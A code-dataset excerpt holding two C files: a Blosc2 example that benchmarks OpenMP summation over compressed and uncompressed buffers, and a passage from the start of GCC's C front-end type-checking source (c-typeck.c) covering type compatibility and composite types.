source stringlengths 3 92 | c stringlengths 26 2.25M |
|---|---|
sum_openmp.c | /*
Copyright (C) 2021 The Blosc Developers <blosc@blosc.org>
https://blosc.org
License: BSD 3-Clause (see LICENSE.txt)
Example program showing how to operate with compressed buffers.
To compile this program for synthetic data (default):
$ gcc -fopenmp -O3 sum_openmp.c -o sum_openmp -lblosc2
To run:
$ OMP_PROC_BIND=spread OMP_NUM_THREADS=8 ./sum_openmp
Blosc version info: 2.0.0a6.dev ($Date:: 2018-05-18 #$)
Sum for uncompressed data: 199950000000
Sum time for uncompressed data: 0.0288 s, 26459.3 MB/s
Compression ratio: 762.9 MB -> 14.0 MB (54.6x)
Compression time: 0.288 s, 2653.5 MB/s
Sum for *compressed* data: 199950000000
Sum time for *compressed* data: 0.0188 s, 40653.7 MB/s
To use real (rainfall) data:
$ gcc -DRAINFALL -fopenmp -Ofast sum_openmp.c -o sum_openmp
And running it:
$ OMP_PROC_BIND=spread OMP_NUM_THREADS=8 ./sum_openmp
Blosc version info: 2.0.0a6.dev ($Date:: 2018-05-18 #$)
Sum for uncompressed data: 29741012
Sum time for uncompressed data: 0.0149 s, 25627.4 MB/s
Compression ratio: 381.5 MB -> 71.3 MB (5.3x)
Compression time: 1.53 s, 249.1 MB/s
Sum for *compressed* data: 29741012
Sum time for *compressed* data: 0.0247 s, 15467.5 MB/s
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <errno.h>
#include <assert.h>
#include "blosc2.h"
#define KB 1024.
#define MB (1024*KB)
#define GB (1024*MB)
#define N (100 * 1000 * 1000)
#define CHUNKSIZE (16 * 1000)
#define NCHUNKS (N / CHUNKSIZE)
#define NTHREADS 8
#define NITER 5
#ifdef RAINFALL
#define SYNTHETIC false
#else
#define SYNTHETIC true
#endif
#if SYNTHETIC == true
#define DTYPE int64_t
#define CLEVEL 3
#define CODEC BLOSC_BLOSCLZ
#else
#define DTYPE float
#define CLEVEL 1
#define CODEC BLOSC_LZ4
#endif
int main(void) {
static DTYPE udata[N];
DTYPE chunk_buf[CHUNKSIZE];
int32_t isize = CHUNKSIZE * sizeof(DTYPE);
DTYPE sum, compressed_sum;
int64_t nbytes, cbytes;
blosc2_schunk* schunk;
int i, j, nchunk;
blosc_timestamp_t last, current;
double ttotal, itotal;
char* envvar = NULL;
printf("Blosc version info: %s (%s)\n",
BLOSC_VERSION_STRING, BLOSC_VERSION_DATE);
// Fill the buffer for a chunk
if (SYNTHETIC) {
for (j = 0; j < CHUNKSIZE; j++) {
chunk_buf[j] = j;
}
}
else {
struct stat info;
const char *filegrid = "rainfall-grid-150x150.bin";
if (stat(filegrid, &info) != 0) {
printf("Grid file %s not found!", filegrid);
exit(1);
}
char *cdata = malloc(info.st_size);
FILE *f = fopen(filegrid, "rb");
size_t blocks_read = fread(cdata, info.st_size, 1, f);
assert(blocks_read == 1);
fclose(f);
int dsize = blosc_getitem(cdata, 0, CHUNKSIZE, chunk_buf);
if (dsize < 0) {
printf("blosc_getitem() error. Error code: %d\n. Probably reading too much data?", dsize);
exit(1);
}
free(cdata);
}
// Fill the uncompressed dataset with data chunks
for (i = 0; i < N / CHUNKSIZE; i++) {
for (j = 0; j < CHUNKSIZE; j++) {
udata[i * CHUNKSIZE + j] = chunk_buf[j];
}
}
// Reduce uncompressed dataset
ttotal = 1e10;
sum = 0;
for (int n = 0; n < NITER; n++) {
sum = 0;
blosc_set_timestamp(&last);
#pragma omp parallel for reduction (+:sum)
for (i = 0; i < N; i++) {
sum += udata[i];
}
blosc_set_timestamp(¤t);
itotal = blosc_elapsed_secs(last, current);
if (itotal < ttotal) ttotal = itotal;
}
printf("Sum for uncompressed data: %10.0f\n", (double)sum);
printf("Sum time for uncompressed data: %.3g s, %.1f MB/s\n",
ttotal, (double)(isize * NCHUNKS) / (double)(ttotal * MB));
// Create a super-chunk container for the compressed container
long codec = CODEC;
envvar = getenv("SUM_COMPRESSOR");
if (envvar != NULL) {
codec = blosc_compname_to_compcode(envvar);
if (codec < 0) {
printf("Unknown compresssor: %s\n", envvar);
return 1;
}
}
blosc2_cparams cparams = BLOSC2_CPARAMS_DEFAULTS;
cparams.compcode = (uint8_t)codec;
long clevel = CLEVEL;
envvar = getenv("SUM_CLEVEL");
if (envvar != NULL) {
clevel = strtol(envvar, NULL, 10);
}
cparams.clevel = (uint8_t)clevel;
cparams.typesize = sizeof(DTYPE);
cparams.nthreads = 1;
blosc2_dparams dparams = BLOSC2_DPARAMS_DEFAULTS;
dparams.nthreads = 1;
blosc_set_timestamp(&last);
blosc2_storage storage = {.cparams=&cparams, .dparams=&dparams};
schunk = blosc2_schunk_new(&storage);
for (nchunk = 0; nchunk < NCHUNKS; nchunk++) {
for (i = 0; i < CHUNKSIZE; i++) {
chunk_buf[i] = udata[i + nchunk * CHUNKSIZE];
}
blosc2_schunk_append_buffer(schunk, chunk_buf, isize);
}
blosc_set_timestamp(¤t);
ttotal = blosc_elapsed_secs(last, current);
nbytes = schunk->nbytes;
cbytes = schunk->cbytes;
printf("Compression ratio: %.1f MB -> %.1f MB (%.1fx)\n",
nbytes / MB, cbytes / MB, (1. * nbytes) / cbytes);
printf("Compression time: %.3g s, %.1f MB/s\n",
ttotal, nbytes / (ttotal * MB));
int nthreads = NTHREADS;
envvar = getenv("OMP_NUM_THREADS");
if (envvar != NULL) {
long value;
value = strtol(envvar, NULL, 10);
if ((value != EINVAL) && (value >= 0)) {
nthreads = (int)value;
}
}
// Build buffers and contexts for computations
int nchunks_thread = NCHUNKS / nthreads;
int remaining_chunks = NCHUNKS - nchunks_thread * nthreads;
blosc2_context **dctx = malloc(nthreads * sizeof(void*));
DTYPE** chunk = malloc(nthreads * sizeof(void*));
for (j = 0; j < nthreads; j++) {
chunk[j] = malloc(CHUNKSIZE * sizeof(DTYPE));
}
// Reduce uncompressed dataset
blosc_set_timestamp(&last);
ttotal = 1e10;
compressed_sum = 0;
for (int n = 0; n < NITER; n++) {
compressed_sum = 0;
#pragma omp parallel for private(nchunk) reduction (+:compressed_sum)
for (j = 0; j < nthreads; j++) {
dctx[j] = blosc2_create_dctx(dparams);
for (nchunk = 0; nchunk < nchunks_thread; nchunk++) {
blosc2_decompress_ctx(dctx[j], schunk->data[j * nchunks_thread + nchunk], INT32_MAX,
(void*)(chunk[j]), isize);
for (i = 0; i < CHUNKSIZE; i++) {
compressed_sum += chunk[j][i];
//compressed_sum += i + (j * nchunks_thread + nchunk) * CHUNKSIZE;
}
}
}
for (nchunk = NCHUNKS - remaining_chunks; nchunk < NCHUNKS; nchunk++) {
blosc2_decompress_ctx(dctx[0], schunk->data[nchunk], INT32_MAX, (void*)(chunk[0]), isize);
for (i = 0; i < CHUNKSIZE; i++) {
compressed_sum += chunk[0][i];
//compressed_sum += i + nchunk * CHUNKSIZE;
}
}
blosc_set_timestamp(¤t);
itotal = blosc_elapsed_secs(last, current);
if (itotal < ttotal) ttotal = itotal;
}
printf("Sum for *compressed* data: %10.0f\n", (double)compressed_sum);
printf("Sum time for *compressed* data: %.3g s, %.1f MB/s\n",
ttotal, nbytes / (ttotal * MB));
//printf("sum, csum: %f, %f\n", sum, compressed_sum);
if (SYNTHETIC) {
// difficult to fulfill for single precision
assert(sum == compressed_sum);
}
/* Free resources */
blosc2_schunk_free(schunk);
return 0;
}
|
c-typeck.c | /* Build expressions with type checking for C compiler.
Copyright (C) 1987-2020 Free Software Foundation, Inc.
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; either version 3, or (at your option) any later
version.
GCC is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3. If not see
<http://www.gnu.org/licenses/>. */
/* This file is part of the C front end.
It contains routines to build C expressions given their operands,
including computing the types of the result, C-specific error checks,
and some optimization. */
#include "config.h"
#include "system.h"
#include "coretypes.h"
#include "memmodel.h"
#include "target.h"
#include "function.h"
#include "bitmap.h"
#include "c-tree.h"
#include "gimple-expr.h"
#include "predict.h"
#include "stor-layout.h"
#include "trans-mem.h"
#include "varasm.h"
#include "stmt.h"
#include "langhooks.h"
#include "c-lang.h"
#include "intl.h"
#include "tree-iterator.h"
#include "gimplify.h"
#include "tree-inline.h"
#include "omp-general.h"
#include "c-family/c-objc.h"
#include "c-family/c-ubsan.h"
#include "gomp-constants.h"
#include "spellcheck-tree.h"
#include "gcc-rich-location.h"
#include "stringpool.h"
#include "attribs.h"
#include "asan.h"
/* Possible cases of implicit bad conversions. Used to select
diagnostic messages in convert_for_assignment. */
enum impl_conv {
ic_argpass,
ic_assign,
ic_init,
ic_return
};
/* The level of nesting inside "__alignof__". */
int in_alignof;
/* The level of nesting inside "sizeof". */
int in_sizeof;
/* The level of nesting inside "typeof". */
int in_typeof;
/* The argument of last parsed sizeof expression, only to be tested
if expr.original_code == SIZEOF_EXPR. */
tree c_last_sizeof_arg;
location_t c_last_sizeof_loc;
/* Nonzero if we might need to print a "missing braces around
initializer" message within this initializer. */
static int found_missing_braces;
static int require_constant_value;
static int require_constant_elements;
static bool null_pointer_constant_p (const_tree);
static tree qualify_type (tree, tree);
static int tagged_types_tu_compatible_p (const_tree, const_tree, bool *,
bool *);
static int comp_target_types (location_t, tree, tree);
static int function_types_compatible_p (const_tree, const_tree, bool *,
bool *);
static int type_lists_compatible_p (const_tree, const_tree, bool *, bool *);
static tree lookup_field (tree, tree);
static int convert_arguments (location_t, vec<location_t>, tree,
vec<tree, va_gc> *, vec<tree, va_gc> *, tree,
tree);
static tree pointer_diff (location_t, tree, tree, tree *);
static tree convert_for_assignment (location_t, location_t, tree, tree, tree,
enum impl_conv, bool, tree, tree, int,
int = 0);
static tree valid_compound_expr_initializer (tree, tree);
static void push_string (const char *);
static void push_member_name (tree);
static int spelling_length (void);
static char *print_spelling (char *);
static void warning_init (location_t, int, const char *);
static tree digest_init (location_t, tree, tree, tree, bool, bool, int);
static void output_init_element (location_t, tree, tree, bool, tree, tree, bool,
bool, struct obstack *);
static void output_pending_init_elements (int, struct obstack *);
static bool set_designator (location_t, bool, struct obstack *);
static void push_range_stack (tree, struct obstack *);
static void add_pending_init (location_t, tree, tree, tree, bool,
struct obstack *);
static void set_nonincremental_init (struct obstack *);
static void set_nonincremental_init_from_string (tree, struct obstack *);
static tree find_init_member (tree, struct obstack *);
static void readonly_warning (tree, enum lvalue_use);
static int lvalue_or_else (location_t, const_tree, enum lvalue_use);
static void record_maybe_used_decl (tree);
static int comptypes_internal (const_tree, const_tree, bool *, bool *);
/* Return true if EXP is a null pointer constant, false otherwise. */
static bool
null_pointer_constant_p (const_tree expr)
{
/* This should really operate on c_expr structures, but they aren't
yet available everywhere required. */
tree type = TREE_TYPE (expr);
return (TREE_CODE (expr) == INTEGER_CST
&& !TREE_OVERFLOW (expr)
&& integer_zerop (expr)
&& (INTEGRAL_TYPE_P (type)
|| (TREE_CODE (type) == POINTER_TYPE
&& VOID_TYPE_P (TREE_TYPE (type))
&& TYPE_QUALS (TREE_TYPE (type)) == TYPE_UNQUALIFIED)));
}
/* EXPR may appear in an unevaluated part of an integer constant
expression, but not in an evaluated part. Wrap it in a
C_MAYBE_CONST_EXPR, or mark it with TREE_OVERFLOW if it is just an
INTEGER_CST and we cannot create a C_MAYBE_CONST_EXPR. */
static tree
note_integer_operands (tree expr)
{
tree ret;
if (TREE_CODE (expr) == INTEGER_CST && in_late_binary_op)
{
ret = copy_node (expr);
TREE_OVERFLOW (ret) = 1;
}
else
{
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (expr), NULL_TREE, expr);
C_MAYBE_CONST_EXPR_INT_OPERANDS (ret) = 1;
}
return ret;
}
/* Having checked whether EXPR may appear in an unevaluated part of an
integer constant expression and found that it may, remove any
C_MAYBE_CONST_EXPR noting this fact and return the resulting
expression. */
static inline tree
remove_c_maybe_const_expr (tree expr)
{
if (TREE_CODE (expr) == C_MAYBE_CONST_EXPR)
return C_MAYBE_CONST_EXPR_EXPR (expr);
else
return expr;
}
/* This is a cache to hold if two types are compatible or not. */
struct tagged_tu_seen_cache {
const struct tagged_tu_seen_cache * next;
const_tree t1;
const_tree t2;
/* The return value of tagged_types_tu_compatible_p if we had seen
these two types already. */
int val;
};
static const struct tagged_tu_seen_cache * tagged_tu_seen_base;
static void free_all_tagged_tu_seen_up_to (const struct tagged_tu_seen_cache *);
/* Do `exp = require_complete_type (loc, exp);' to make sure exp
does not have an incomplete type. (That includes void types.)
LOC is the location of the use. */
tree
require_complete_type (location_t loc, tree value)
{
tree type = TREE_TYPE (value);
if (error_operand_p (value))
return error_mark_node;
/* First, detect a valid value with a complete type. */
if (COMPLETE_TYPE_P (type))
return value;
c_incomplete_type_error (loc, value, type);
return error_mark_node;
}
/* Print an error message for invalid use of an incomplete type.
VALUE is the expression that was used (or 0 if that isn't known)
and TYPE is the type that was invalid. LOC is the location for
the error. */
void
c_incomplete_type_error (location_t loc, const_tree value, const_tree type)
{
/* Avoid duplicate error message. */
if (TREE_CODE (type) == ERROR_MARK)
return;
if (value != NULL_TREE && (VAR_P (value) || TREE_CODE (value) == PARM_DECL))
error_at (loc, "%qD has an incomplete type %qT", value, type);
else
{
retry:
/* We must print an error message. Be clever about what it says. */
switch (TREE_CODE (type))
{
case RECORD_TYPE:
case UNION_TYPE:
case ENUMERAL_TYPE:
break;
case VOID_TYPE:
error_at (loc, "invalid use of void expression");
return;
case ARRAY_TYPE:
if (TYPE_DOMAIN (type))
{
if (TYPE_MAX_VALUE (TYPE_DOMAIN (type)) == NULL)
{
error_at (loc, "invalid use of flexible array member");
return;
}
type = TREE_TYPE (type);
goto retry;
}
error_at (loc, "invalid use of array with unspecified bounds");
return;
default:
gcc_unreachable ();
}
if (TREE_CODE (TYPE_NAME (type)) == IDENTIFIER_NODE)
error_at (loc, "invalid use of undefined type %qT", type);
else
/* If this type has a typedef-name, the TYPE_NAME is a TYPE_DECL. */
error_at (loc, "invalid use of incomplete typedef %qT", type);
}
}
/* Given a type, apply default promotions wrt unnamed function
arguments and return the new type. */
tree
c_type_promotes_to (tree type)
{
tree ret = NULL_TREE;
if (TYPE_MAIN_VARIANT (type) == float_type_node)
ret = double_type_node;
else if (c_promoting_integer_type_p (type))
{
/* Preserve unsignedness if not really getting any wider. */
if (TYPE_UNSIGNED (type)
&& (TYPE_PRECISION (type) == TYPE_PRECISION (integer_type_node)))
ret = unsigned_type_node;
else
ret = integer_type_node;
}
if (ret != NULL_TREE)
return (TYPE_ATOMIC (type)
? c_build_qualified_type (ret, TYPE_QUAL_ATOMIC)
: ret);
return type;
}
/* Return true if between two named address spaces, whether there is a superset
named address space that encompasses both address spaces. If there is a
superset, return which address space is the superset. */
static bool
addr_space_superset (addr_space_t as1, addr_space_t as2, addr_space_t *common)
{
if (as1 == as2)
{
*common = as1;
return true;
}
else if (targetm.addr_space.subset_p (as1, as2))
{
*common = as2;
return true;
}
else if (targetm.addr_space.subset_p (as2, as1))
{
*common = as1;
return true;
}
else
return false;
}
/* Return a variant of TYPE which has all the type qualifiers of LIKE
as well as those of TYPE. */
static tree
qualify_type (tree type, tree like)
{
addr_space_t as_type = TYPE_ADDR_SPACE (type);
addr_space_t as_like = TYPE_ADDR_SPACE (like);
addr_space_t as_common;
/* If the two named address spaces are different, determine the common
superset address space. If there isn't one, raise an error. */
if (!addr_space_superset (as_type, as_like, &as_common))
{
as_common = as_type;
error ("%qT and %qT are in disjoint named address spaces",
type, like);
}
return c_build_qualified_type (type,
TYPE_QUALS_NO_ADDR_SPACE (type)
| TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (like)
| ENCODE_QUAL_ADDR_SPACE (as_common));
}
/* Return true iff the given tree T is a variable length array. */
bool
c_vla_type_p (const_tree t)
{
if (TREE_CODE (t) == ARRAY_TYPE
&& C_TYPE_VARIABLE_SIZE (t))
return true;
return false;
}
/* If NTYPE is a type of a non-variadic function with a prototype
and OTYPE is a type of a function without a prototype and ATTRS
contains attribute format, diagnosess and removes it from ATTRS.
Returns the result of build_type_attribute_variant of NTYPE and
the (possibly) modified ATTRS. */
static tree
build_functype_attribute_variant (tree ntype, tree otype, tree attrs)
{
if (!prototype_p (otype)
&& prototype_p (ntype)
&& lookup_attribute ("format", attrs))
{
warning_at (input_location, OPT_Wattributes,
"%qs attribute cannot be applied to a function that "
"does not take variable arguments", "format");
attrs = remove_attribute ("format", attrs);
}
return build_type_attribute_variant (ntype, attrs);
}
/* Return the composite type of two compatible types.
We assume that comptypes has already been done and returned
nonzero; if that isn't so, this may crash. In particular, we
assume that qualifiers match. */
tree
composite_type (tree t1, tree t2)
{
enum tree_code code1;
enum tree_code code2;
tree attributes;
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
code1 = TREE_CODE (t1);
code2 = TREE_CODE (t2);
/* Merge the attributes. */
attributes = targetm.merge_type_attributes (t1, t2);
/* If one is an enumerated type and the other is the compatible
integer type, the composite type might be either of the two
(DR#013 question 3). For consistency, use the enumerated type as
the composite type. */
if (code1 == ENUMERAL_TYPE && code2 == INTEGER_TYPE)
return t1;
if (code2 == ENUMERAL_TYPE && code1 == INTEGER_TYPE)
return t2;
gcc_assert (code1 == code2);
switch (code1)
{
case POINTER_TYPE:
/* For two pointers, do this recursively on the target type. */
{
tree pointed_to_1 = TREE_TYPE (t1);
tree pointed_to_2 = TREE_TYPE (t2);
tree target = composite_type (pointed_to_1, pointed_to_2);
t1 = build_pointer_type_for_mode (target, TYPE_MODE (t1), false);
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
case ARRAY_TYPE:
{
tree elt = composite_type (TREE_TYPE (t1), TREE_TYPE (t2));
int quals;
tree unqual_elt;
tree d1 = TYPE_DOMAIN (t1);
tree d2 = TYPE_DOMAIN (t2);
bool d1_variable, d2_variable;
bool d1_zero, d2_zero;
bool t1_complete, t2_complete;
/* We should not have any type quals on arrays at all. */
gcc_assert (!TYPE_QUALS_NO_ADDR_SPACE (t1)
&& !TYPE_QUALS_NO_ADDR_SPACE (t2));
t1_complete = COMPLETE_TYPE_P (t1);
t2_complete = COMPLETE_TYPE_P (t2);
d1_zero = d1 == NULL_TREE || !TYPE_MAX_VALUE (d1);
d2_zero = d2 == NULL_TREE || !TYPE_MAX_VALUE (d2);
d1_variable = (!d1_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d1)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d1)) != INTEGER_CST));
d2_variable = (!d2_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d2)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d2)) != INTEGER_CST));
d1_variable = d1_variable || (d1_zero && c_vla_type_p (t1));
d2_variable = d2_variable || (d2_zero && c_vla_type_p (t2));
/* Save space: see if the result is identical to one of the args. */
if (elt == TREE_TYPE (t1) && TYPE_DOMAIN (t1)
&& (d2_variable || d2_zero || !d1_variable))
return build_type_attribute_variant (t1, attributes);
if (elt == TREE_TYPE (t2) && TYPE_DOMAIN (t2)
&& (d1_variable || d1_zero || !d2_variable))
return build_type_attribute_variant (t2, attributes);
if (elt == TREE_TYPE (t1) && !TYPE_DOMAIN (t2) && !TYPE_DOMAIN (t1))
return build_type_attribute_variant (t1, attributes);
if (elt == TREE_TYPE (t2) && !TYPE_DOMAIN (t2) && !TYPE_DOMAIN (t1))
return build_type_attribute_variant (t2, attributes);
/* Merge the element types, and have a size if either arg has
one. We may have qualifiers on the element types. To set
up TYPE_MAIN_VARIANT correctly, we need to form the
composite of the unqualified types and add the qualifiers
back at the end. */
quals = TYPE_QUALS (strip_array_types (elt));
unqual_elt = c_build_qualified_type (elt, TYPE_UNQUALIFIED);
t1 = build_array_type (unqual_elt,
TYPE_DOMAIN ((TYPE_DOMAIN (t1)
&& (d2_variable
|| d2_zero
|| !d1_variable))
? t1
: t2));
/* Ensure a composite type involving a zero-length array type
is a zero-length type not an incomplete type. */
if (d1_zero && d2_zero
&& (t1_complete || t2_complete)
&& !COMPLETE_TYPE_P (t1))
{
TYPE_SIZE (t1) = bitsize_zero_node;
TYPE_SIZE_UNIT (t1) = size_zero_node;
}
t1 = c_build_qualified_type (t1, quals);
return build_type_attribute_variant (t1, attributes);
}
case ENUMERAL_TYPE:
case RECORD_TYPE:
case UNION_TYPE:
if (attributes != NULL)
{
/* Try harder not to create a new aggregate type. */
if (attribute_list_equal (TYPE_ATTRIBUTES (t1), attributes))
return t1;
if (attribute_list_equal (TYPE_ATTRIBUTES (t2), attributes))
return t2;
}
return build_type_attribute_variant (t1, attributes);
case FUNCTION_TYPE:
/* Function types: prefer the one that specified arg types.
If both do, merge the arg types. Also merge the return types. */
{
tree valtype = composite_type (TREE_TYPE (t1), TREE_TYPE (t2));
tree p1 = TYPE_ARG_TYPES (t1);
tree p2 = TYPE_ARG_TYPES (t2);
int len;
tree newargs, n;
int i;
/* Save space: see if the result is identical to one of the args. */
if (valtype == TREE_TYPE (t1) && !TYPE_ARG_TYPES (t2))
return build_functype_attribute_variant (t1, t2, attributes);
if (valtype == TREE_TYPE (t2) && !TYPE_ARG_TYPES (t1))
return build_functype_attribute_variant (t2, t1, attributes);
/* Simple way if one arg fails to specify argument types. */
if (TYPE_ARG_TYPES (t1) == NULL_TREE)
{
t1 = build_function_type (valtype, TYPE_ARG_TYPES (t2));
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
if (TYPE_ARG_TYPES (t2) == NULL_TREE)
{
t1 = build_function_type (valtype, TYPE_ARG_TYPES (t1));
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
/* If both args specify argument types, we must merge the two
lists, argument by argument. */
for (len = 0, newargs = p1;
newargs && newargs != void_list_node;
len++, newargs = TREE_CHAIN (newargs))
;
for (i = 0; i < len; i++)
newargs = tree_cons (NULL_TREE, NULL_TREE, newargs);
n = newargs;
for (; p1 && p1 != void_list_node;
p1 = TREE_CHAIN (p1), p2 = TREE_CHAIN (p2), n = TREE_CHAIN (n))
{
/* A null type means arg type is not specified.
Take whatever the other function type has. */
if (TREE_VALUE (p1) == NULL_TREE)
{
TREE_VALUE (n) = TREE_VALUE (p2);
goto parm_done;
}
if (TREE_VALUE (p2) == NULL_TREE)
{
TREE_VALUE (n) = TREE_VALUE (p1);
goto parm_done;
}
/* Given wait (union {union wait *u; int *i} *)
and wait (union wait *),
prefer union wait * as type of parm. */
if (TREE_CODE (TREE_VALUE (p1)) == UNION_TYPE
&& TREE_VALUE (p1) != TREE_VALUE (p2))
{
tree memb;
tree mv2 = TREE_VALUE (p2);
if (mv2 && mv2 != error_mark_node
&& TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = TYPE_MAIN_VARIANT (mv2);
for (memb = TYPE_FIELDS (TREE_VALUE (p1));
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = TYPE_MAIN_VARIANT (mv3);
if (comptypes (mv3, mv2))
{
TREE_VALUE (n) = composite_type (TREE_TYPE (memb),
TREE_VALUE (p2));
pedwarn (input_location, OPT_Wpedantic,
"function types not truly compatible in ISO C");
goto parm_done;
}
}
}
if (TREE_CODE (TREE_VALUE (p2)) == UNION_TYPE
&& TREE_VALUE (p2) != TREE_VALUE (p1))
{
tree memb;
tree mv1 = TREE_VALUE (p1);
if (mv1 && mv1 != error_mark_node
&& TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = TYPE_MAIN_VARIANT (mv1);
for (memb = TYPE_FIELDS (TREE_VALUE (p2));
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = TYPE_MAIN_VARIANT (mv3);
if (comptypes (mv3, mv1))
{
TREE_VALUE (n) = composite_type (TREE_TYPE (memb),
TREE_VALUE (p1));
pedwarn (input_location, OPT_Wpedantic,
"function types not truly compatible in ISO C");
goto parm_done;
}
}
}
TREE_VALUE (n) = composite_type (TREE_VALUE (p1), TREE_VALUE (p2));
parm_done: ;
}
t1 = build_function_type (valtype, newargs);
t1 = qualify_type (t1, t2);
}
/* FALLTHRU */
default:
return build_type_attribute_variant (t1, attributes);
}
}
/* Return the type of a conditional expression between pointers to
possibly differently qualified versions of compatible types.
We assume that comp_target_types has already been done and returned
nonzero; if that isn't so, this may crash. */
static tree
common_pointer_type (tree t1, tree t2)
{
tree attributes;
tree pointed_to_1, mv1;
tree pointed_to_2, mv2;
tree target;
unsigned target_quals;
addr_space_t as1, as2, as_common;
int quals1, quals2;
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
gcc_assert (TREE_CODE (t1) == POINTER_TYPE
&& TREE_CODE (t2) == POINTER_TYPE);
/* Merge the attributes. */
attributes = targetm.merge_type_attributes (t1, t2);
/* Find the composite type of the target types, and combine the
qualifiers of the two types' targets. Do not lose qualifiers on
array element types by taking the TYPE_MAIN_VARIANT. */
mv1 = pointed_to_1 = TREE_TYPE (t1);
mv2 = pointed_to_2 = TREE_TYPE (t2);
if (TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = TYPE_MAIN_VARIANT (pointed_to_1);
if (TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = TYPE_MAIN_VARIANT (pointed_to_2);
target = composite_type (mv1, mv2);
/* Strip array types to get correct qualifier for pointers to arrays */
quals1 = TYPE_QUALS_NO_ADDR_SPACE (strip_array_types (pointed_to_1));
quals2 = TYPE_QUALS_NO_ADDR_SPACE (strip_array_types (pointed_to_2));
/* For function types do not merge const qualifiers, but drop them
if used inconsistently. The middle-end uses these to mark const
and noreturn functions. */
if (TREE_CODE (pointed_to_1) == FUNCTION_TYPE)
target_quals = (quals1 & quals2);
else
target_quals = (quals1 | quals2);
/* If the two named address spaces are different, determine the common
superset address space. This is guaranteed to exist due to the
assumption that comp_target_type returned non-zero. */
as1 = TYPE_ADDR_SPACE (pointed_to_1);
as2 = TYPE_ADDR_SPACE (pointed_to_2);
if (!addr_space_superset (as1, as2, &as_common))
gcc_unreachable ();
target_quals |= ENCODE_QUAL_ADDR_SPACE (as_common);
t1 = build_pointer_type (c_build_qualified_type (target, target_quals));
return build_type_attribute_variant (t1, attributes);
}
/* Return the common type for two arithmetic types under the usual
arithmetic conversions. The default conversions have already been
applied, and enumerated types converted to their compatible integer
types. The resulting type is unqualified and has no attributes.
This is the type for the result of most arithmetic operations
if the operands have the given two types. */
static tree
c_common_type (tree t1, tree t2)
{
enum tree_code code1;
enum tree_code code2;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
if (TYPE_QUALS (t1) != TYPE_UNQUALIFIED)
t1 = TYPE_MAIN_VARIANT (t1);
if (TYPE_QUALS (t2) != TYPE_UNQUALIFIED)
t2 = TYPE_MAIN_VARIANT (t2);
if (TYPE_ATTRIBUTES (t1) != NULL_TREE)
t1 = build_type_attribute_variant (t1, NULL_TREE);
if (TYPE_ATTRIBUTES (t2) != NULL_TREE)
t2 = build_type_attribute_variant (t2, NULL_TREE);
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
code1 = TREE_CODE (t1);
code2 = TREE_CODE (t2);
gcc_assert (code1 == VECTOR_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE || code1 == REAL_TYPE
|| code1 == INTEGER_TYPE);
gcc_assert (code2 == VECTOR_TYPE || code2 == COMPLEX_TYPE
|| code2 == FIXED_POINT_TYPE || code2 == REAL_TYPE
|| code2 == INTEGER_TYPE);
/* When one operand is a decimal float type, the other operand cannot be
a generic float type or a complex type. We also disallow vector types
here. */
if ((DECIMAL_FLOAT_TYPE_P (t1) || DECIMAL_FLOAT_TYPE_P (t2))
&& !(DECIMAL_FLOAT_TYPE_P (t1) && DECIMAL_FLOAT_TYPE_P (t2)))
{
if (code1 == VECTOR_TYPE || code2 == VECTOR_TYPE)
{
error ("cannot mix operands of decimal floating and vector types");
return error_mark_node;
}
if (code1 == COMPLEX_TYPE || code2 == COMPLEX_TYPE)
{
error ("cannot mix operands of decimal floating and complex types");
return error_mark_node;
}
if (code1 == REAL_TYPE && code2 == REAL_TYPE)
{
error ("cannot mix operands of decimal floating "
"and other floating types");
return error_mark_node;
}
}
/* If one type is a vector type, return that type. (How the usual
arithmetic conversions apply to the vector types extension is not
precisely specified.) */
if (code1 == VECTOR_TYPE)
return t1;
if (code2 == VECTOR_TYPE)
return t2;
/* If one type is complex, form the common type of the non-complex
components, then make that complex. Use T1 or T2 if it is the
required type. */
if (code1 == COMPLEX_TYPE || code2 == COMPLEX_TYPE)
{
tree subtype1 = code1 == COMPLEX_TYPE ? TREE_TYPE (t1) : t1;
tree subtype2 = code2 == COMPLEX_TYPE ? TREE_TYPE (t2) : t2;
tree subtype = c_common_type (subtype1, subtype2);
if (code1 == COMPLEX_TYPE && TREE_TYPE (t1) == subtype)
return t1;
else if (code2 == COMPLEX_TYPE && TREE_TYPE (t2) == subtype)
return t2;
else
return build_complex_type (subtype);
}
/* If only one is real, use it as the result. */
if (code1 == REAL_TYPE && code2 != REAL_TYPE)
return t1;
if (code2 == REAL_TYPE && code1 != REAL_TYPE)
return t2;
/* If both are real and either are decimal floating point types, use
